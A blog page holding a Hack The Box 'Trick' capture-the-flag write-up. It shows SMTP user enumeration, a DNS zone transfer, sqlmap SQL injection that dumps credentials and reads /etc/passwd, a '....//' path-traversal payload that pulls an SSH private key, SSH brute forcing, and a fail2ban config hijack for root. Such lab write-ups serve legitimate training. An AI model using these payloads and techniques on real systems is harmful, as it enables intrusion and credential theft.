<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>HTB: Trick Writeup - Alex Loney</title>
<meta name="description" content="There are spoilers below for the Hack The Box box named Trick. Stop reading here if you do not want spoilers!!!">


  <meta name="author" content="Alex Loney">
  
  <meta property="article:author" content="Alex Loney">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Alex Loney">
<meta property="og:title" content="HTB: Trick Writeup">
<meta property="og:url" content="/blog/writeup/htb/htb-trick/">


  <meta property="og:description" content="There are spoilers below for the Hack The Box box named Trick. Stop reading here if you do not want spoilers!!!">







  <meta property="article:published_time" content="2022-06-24T10:41:00-07:00">






<link rel="canonical" href="/blog/writeup/htb/htb-trick/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": null,
      "url": "/"
    
  }
</script>







<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Alex Loney Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          Alex Loney
          
        </a>
        <ul class="visible-links">
<li class="masthead__menu-item">
              <a href="/posts/">Posts</a>
            </li>
<li class="masthead__menu-item">
              <a href="/categories/">Categories</a>
            </li>
<li class="masthead__menu-item">
              <a href="/tags/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/about/">About</a>
            </li>
</ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="/">
        <img src="/assets/images/bio-photo.jpg" alt="Alex Loney" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="/" itemprop="url">Alex Loney</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Software Engineer by trade and passion, everything else by curiosity</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      

      
        
          
            <li><a href="https://alexloney.com" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fas fa-fw fa-link" aria-hidden="true"></i><span class="label">Website</span></a></li>
          
        
          
            <li><a href="https://github.com/alexloney" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="HTB: Trick Writeup">
    <meta itemprop="description" content="There are spoilers below for the Hack The Box box named Trick. Stop reading here if you do not want spoilers!!!">
    <meta itemprop="datePublished" content="2022-06-24T10:41:00-07:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="/blog/writeup/htb/htb-trick/" class="u-url" itemprop="url">HTB: Trick Writeup
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          7 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>There are spoilers below for the Hack The Box box named Trick. Stop reading here if you do not want spoilers!!!</p>

<hr>
<p>This box was listed as “easy” however I had more trouble with it than other easy boxes I’ve done.</p>

<h1 id="enumeration">Enumeration</h1>
<p>I began as always with an nmap port scan</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap trick.htb                         
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-06-24 13:42 EDT
Nmap scan report <span class="k">for </span>trick.htb <span class="o">(</span>10.10.11.166<span class="o">)</span>
Host is up <span class="o">(</span>0.089s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 996 closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span>
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
53/tcp open  domain
80/tcp open  http

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1.52 seconds
</code></pre></div></div>

<h2 id="port-25">Port 25</h2>
<p>This revealed a few open ports, checking the SMTP port, I was able to verify a couple of users:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hydra v9.3 (c) 2022 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-20 00:24:50
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17 login tries (l:17/p:1), ~2 tries per task
[DATA] attacking smtp-enum://10.129.114.201:25/vrfy
[25][smtp-enum] host: 10.129.114.201   login: root
[25][smtp-enum] host: 10.129.114.201   login: mysql
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-20 00:25:21
</code></pre></div></div>

<h2 id="port-53">Port 53</h2>
<p>Checking the DNS port, I was able to determine the hostname of the machine</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>dig <span class="nt">-p</span> 53 <span class="nt">-x</span> 10.10.11.166 @10.10.11.166

<span class="p">;</span> &lt;&lt;<span class="o">&gt;&gt;</span> DiG 9.18.1-1-Debian &lt;&lt;<span class="o">&gt;&gt;</span> <span class="nt">-p</span> 53 <span class="nt">-x</span> 10.129.114.201 @10.129.114.201
<span class="p">;;</span> global options: +cmd
<span class="p">;;</span> Got answer:
<span class="p">;;</span> -&gt;&gt;HEADER<span class="o">&lt;&lt;-</span> <span class="no">opcode</span><span class="sh">: QUERY, status: NOERROR, id: 58590
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 363a80786340ed523b136e9b62aff689e85ea08e14d7c124 (good)
;; QUESTION SECTION:
;201.114.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
201.114.129.10.in-addr.arpa. 604800 IN  PTR     trick.htb.

;; AUTHORITY SECTION:
114.129.10.in-addr.arpa. 604800 IN      NS      trick.htb.

;; ADDITIONAL SECTION:
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1

;; Query time: 91 msec
;; SERVER: 10.129.114.201#53(10.129.114.201) (UDP)
;; WHEN: Mon Jun 20 00:24:43 EDT 2022
;; MSG SIZE  rcvd: 165
</span></code></pre></div></div>

<p>From there I was able to perform a zone transfer and obtain additional domains</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>dig axfr @10.129.114.201 trick.htb

<span class="p">;</span> &lt;&lt;<span class="o">&gt;&gt;</span> DiG 9.18.1-1-Debian &lt;&lt;<span class="o">&gt;&gt;</span> axfr @10.129.114.201 trick.htb
<span class="p">;</span> <span class="o">(</span>1 server found<span class="o">)</span>
<span class="p">;;</span> global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
<span class="p">;;</span> Query <span class="nb">time</span>: 83 msec
<span class="p">;;</span> SERVER: 10.129.114.201#53<span class="o">(</span>10.129.114.201<span class="o">)</span> <span class="o">(</span>TCP<span class="o">)</span>
<span class="p">;;</span> WHEN: Mon Jun 20 15:28:46 EDT 2022
<span class="p">;;</span> XFR size: 6 records <span class="o">(</span>messages 1, bytes 231<span class="o">)</span>
</code></pre></div></div>

<p>So we now have the following possible domains:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>trick.htb
root.trick.htb
preprod-payroll.trick.htb
</code></pre></div></div>

<h2 id="port-80">Port 80</h2>
<p>Visiting <code class="language-plaintext highlighter-rouge">trick.htb</code> and <code class="language-plaintext highlighter-rouge">root.trick.htb</code> didn’t yield anything interesting, just a barebones basic website. Running a <code class="language-plaintext highlighter-rouge">gobuster</code> scan on it also revealed nothing of note. The third subdomain <code class="language-plaintext highlighter-rouge">preprod-payroll.trick.htb</code> did have something interesting in it, there’s a payroll system. Inserting a single quote into it I was able to determine that it contained a SQL injection vulnerability. Using SQLMap, I was able to discover the login username/password:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>sqlmap <span class="nt">-r</span> get.txt
...
<span class="nt">---</span>
Parameter: username <span class="o">(</span>POST<span class="o">)</span>
    Type: time-based blind
    Title: MySQL <span class="o">&gt;=</span> 5.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span>
    Payload: <span class="nv">username</span><span class="o">=</span>root<span class="s1">' AND (SELECT 8596 FROM (SELECT(SLEEP(5)))WGGL) AND '</span>IitU<span class="s1">'='</span>IitU&amp;password<span class="o">=</span>root
<span class="nt">---</span>
<span class="o">[</span>01:01:06] <span class="o">[</span>INFO] the back-end DBMS is MySQL
...

<span class="nv">$ </span>sqlmap <span class="nt">-r</span> get.txt <span class="nt">--dbs</span>
...
available databases <span class="o">[</span>2]:
<span class="o">[</span><span class="k">*</span><span class="o">]</span> information_schema
<span class="o">[</span><span class="k">*</span><span class="o">]</span> payroll_db
...

<span class="nv">$ </span>sqlmap <span class="nt">-r</span> get.txt <span class="nt">--database</span> payroll_db <span class="nt">--dump</span>
...
Database: payroll_db
Table: <span class="nb">users</span>
<span class="o">[</span>1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| <span class="nb">id</span> | doctor_id | name          | <span class="nb">type</span> | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | &lt;blank&gt; | &lt;blank&gt; | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
...
</code></pre></div></div>

<p>This is where I remained stuck for a while, as the login credentials provided did not appear to provide any additional leads once logged in. Eventually, I discovered that there was another subdomain:</p>

<p>This is where I first got stuck for a while, eventually I found that there are MORE subdomains on the website.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | <span class="nb">sed</span> <span class="s1">'s/\(.*\)/preprod-\1/g'</span> <span class="o">&gt;</span> list.txt

<span class="nv">$ </span>gobuster dns <span class="nt">-w</span> list.txt <span class="nt">-d</span> trick.htb    
<span class="o">===============================================================</span>
Gobuster v3.1.0
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Domain:     trick.htb
<span class="o">[</span>+] Threads:    10
<span class="o">[</span>+] Timeout:    1s
<span class="o">[</span>+] Wordlist:   list.txt
<span class="o">===============================================================</span>
2022/06/24 13:51:50 Starting gobuster <span class="k">in </span>DNS enumeration mode
<span class="o">===============================================================</span>
Found: preprod-marketing.trick.htb
Found: preprod-payroll.trick.htb  
                                   
<span class="o">===============================================================</span>
2022/06/24 13:53:05 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>

<p>When investigating this additional subdomain, I discovered that <code class="language-plaintext highlighter-rouge">index.php</code> accepts a <code class="language-plaintext highlighter-rouge">file=</code> parameter which reads a given file, but at first I was unable to manipulate it to read any arbitrary file. I remained stuck here for a while, looking for additional subdomains, files, parameters, etc.</p>

<p>Eventually, I discovered that SQLMap has a way to read a local system file. Additionally, after a lot of time, I discovered that <code class="language-plaintext highlighter-rouge">/var/www/market/index.php</code> is the index.php file referenced above:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>sqlmap <span class="nt">-r</span> get.txt <span class="nt">--file-read</span> /var/www/market/index.php
...
<span class="nv">$ </span><span class="nb">cat</span> /home/kali/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_var_www_market_index.php             
&lt;?php
<span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="o">[</span><span class="s1">'page'</span><span class="o">]</span><span class="p">;</span>

<span class="k">if</span><span class="o">(!</span>isset<span class="o">(</span><span class="nv">$file</span><span class="o">)</span> <span class="o">||</span> <span class="o">(</span><span class="nv">$file</span><span class="o">==</span><span class="s2">"index.php"</span><span class="o">))</span> <span class="o">{</span>
   include<span class="o">(</span><span class="s2">"/var/www/market/home.html"</span><span class="o">)</span><span class="p">;</span>
<span class="o">}</span>
<span class="k">else</span><span class="o">{</span>
        include<span class="o">(</span><span class="s2">"/var/www/market/"</span>.str_replace<span class="o">(</span><span class="s2">"../"</span>,<span class="s2">""</span>,<span class="nv">$file</span><span class="o">))</span><span class="p">;</span>
<span class="o">}</span>
?&gt;
</code></pre></div></div>

<p>Additionally, I can see that there are multiple users on the system</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>sqlmap <span class="nt">-r</span> get.txt <span class="nt">--file-read</span> /etc/passwd
...
<span class="nv">$ </span><span class="nb">cat</span> /home/kali/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
<span class="nb">bind</span>:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash
</code></pre></div></div>

<h1 id="user">User</h1>
<p>From here, I’m able to exploit the PHP page <code class="language-plaintext highlighter-rouge">index.php</code> to bypass the restriction and access the user <code class="language-plaintext highlighter-rouge">michael</code> RSA key then SSH into the machine with it:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl <span class="nt">--output</span> michael.id_rsa <span class="s1">'http://preprod-marketing.trick.htb/index.php?page=....//....//....//home/michael/.ssh/id_rsa'</span>
<span class="nv">$ </span><span class="nb">chmod </span>600 michael.id_rsa
<span class="nv">$ </span>ssh <span class="nt">-i</span> michael.id_rsa michael@trick.htb
</code></pre></div></div>

<h1 id="root">Root</h1>
<p>Obtaining root was a bit tricky, the first thing to notice is that you have access to run a program <code class="language-plaintext highlighter-rouge">fail2ban</code> as root:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>michael on trick:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin

User michael may run the following commands on trick:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/fail2ban restart
</code></pre></div></div>

<p>From here, it requires investigating what this <code class="language-plaintext highlighter-rouge">fail2ban</code> program is. It turns out that it’s a program used to ban IP addresses due to too many failed attempts. It runs out of <code class="language-plaintext highlighter-rouge">/etc/fail2ban</code>. Looking at the directory it runs out of, I noticed something odd:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-larth</span> /etc/fail2ban/
total 76K
drwxr-xr-x 126 root root      12K Jun 24 18:40 ..
<span class="nt">-rw-r--r--</span>   1 root root      738 Jun 24 20:09 paths-opensuse.conf
<span class="nt">-rw-r--r--</span>   1 root root      573 Jun 24 20:09 paths-debian.conf
<span class="nt">-rw-r--r--</span>   1 root root     2.8K Jun 24 20:09 paths-common.conf
<span class="nt">-rw-r--r--</span>   1 root root      645 Jun 24 20:09 paths-arch.conf
<span class="nt">-rw-r--r--</span>   1 root root      23K Jun 24 20:09 jail.conf
drwxr-xr-x   2 root root     4.0K Jun 24 20:09 fail2ban.d
<span class="nt">-rw-r--r--</span>   1 root root     2.3K Jun 24 20:09 fail2ban.conf
drwxrwx---   2 root security 4.0K Jun 24 20:09 action.d
drwxr-xr-x   2 root root     4.0K Jun 24 20:09 jail.d
drwxr-xr-x   3 root root     4.0K Jun 24 20:09 filter.d
drwxr-xr-x   6 root root     4.0K Jun 24 20:09 <span class="nb">.</span>
</code></pre></div></div>

<p>The folder <code class="language-plaintext highlighter-rouge">action.d</code> has a group of <code class="language-plaintext highlighter-rouge">security</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">groups
</span>michael security
</code></pre></div></div>

<p>And we’re also part of that same group. The <a href="https://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Actions">Actions</a> directory is used to contain commands that are executed when someone is sent to jail. And even more specifically, the <code class="language-plaintext highlighter-rouge">iptables-multiport.conf</code> contains rules which are executed on a ban. And we can rename files in this directory. So while we can’t directly modify the <code class="language-plaintext highlighter-rouge">iptables-multiport.conf</code> file, we can rename it and create a new file. Unfortunately it appears as though this directory is restored back to the original state very quickly, so I had to try this a few times before it eventually worked. I created a script to update the .conf file:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>reset_conf.sh 
<span class="c">#!/bin/bash</span>

<span class="nb">mv</span> <span class="nt">-f</span> /etc/fail2ban/action.d/iptables-multiport.conf<span class="o">{</span>,.backup<span class="o">}</span>
<span class="nb">cat</span> /etc/fail2ban/action.d/iptables-multiport.conf.backup | <span class="nb">sed</span> <span class="s1">'s:^actionban.*$:actionban = cat /root/root.txt &gt; /tmp/root.txt \&amp;\&amp; chmod 777 /tmp/root.txt:g'</span> <span class="o">&gt;</span> /etc/fail2ban/action.d/iptables-multiport.conf
<span class="nb">sudo</span> /etc/init.d/fail2ban restart
</code></pre></div></div>

<p>Then I started a <code class="language-plaintext highlighter-rouge">hydra</code> session to brute force the login and force a ban:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>hydra <span class="nt">-l</span> root <span class="nt">-P</span> /usr/share/wordlists/rockyou.txt trick.htb <span class="nt">-t</span> 4 ssh
</code></pre></div></div>

<p>After a while of trying this and restarting the <code class="language-plaintext highlighter-rouge">fail2ban</code> service with the above script, eventually the <code class="language-plaintext highlighter-rouge">/tmp/root.txt</code> file appeared:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-larth</span> /tmp/root.txt 
<span class="nt">-rwxrwxrwx</span> 1 root root 33 Jun 24 19:42 /tmp/root.txt
</code></pre></div></div>

<p>Note that, instead of performing a cp operation, it would have been possible to start a reverse shell too, or chmod another file that can give you root.</p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#htb" class="page__taxonomy-item p-category" rel="tag">htb</a><span class="sep">, </span>
    
      <a href="/tags/#htb-easy" class="page__taxonomy-item p-category" rel="tag">htb easy</a><span class="sep">, </span>
    
      <a href="/tags/#offsec" class="page__taxonomy-item p-category" rel="tag">offsec</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#blog" class="page__taxonomy-item p-category" rel="tag">blog</a><span class="sep">, </span>
    
      <a href="/categories/#htb" class="page__taxonomy-item p-category" rel="tag">htb</a><span class="sep">, </span>
    
      <a href="/categories/#writeup" class="page__taxonomy-item p-category" rel="tag">writeup</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2022-06-24T10:41:00-07:00">June 24, 2022</time></p>

      </footer>

      <section class="page__share">
  

  <a href="https://twitter.com/intent/tweet?text=HTB%3A+Trick+Writeup%20%2Fblog%2Fwriteup%2Fhtb%2Fhtb-trick%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=%2Fblog%2Fwriteup%2Fhtb%2Fhtb-trick%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=%2Fblog%2Fwriteup%2Fhtb%2Fhtb-trick%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/blog/writeup/htb/htb-dynstr/" class="pagination--pager" title="HTB: Dynstr Writeup
">Previous</a>
    
    
      <a href="#" class="pagination--pager disabled">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">You May Also Enjoy</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-dynstr/" rel="permalink">HTB: Dynstr Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          8 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-knife/" rel="permalink">HTB: Knife Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-tenet/" rel="permalink">HTB: Tenet Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          5 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-love/" rel="permalink">HTB: Love Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    

    
      
        
          <li><a href="https://github.com/alexloney" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    

    
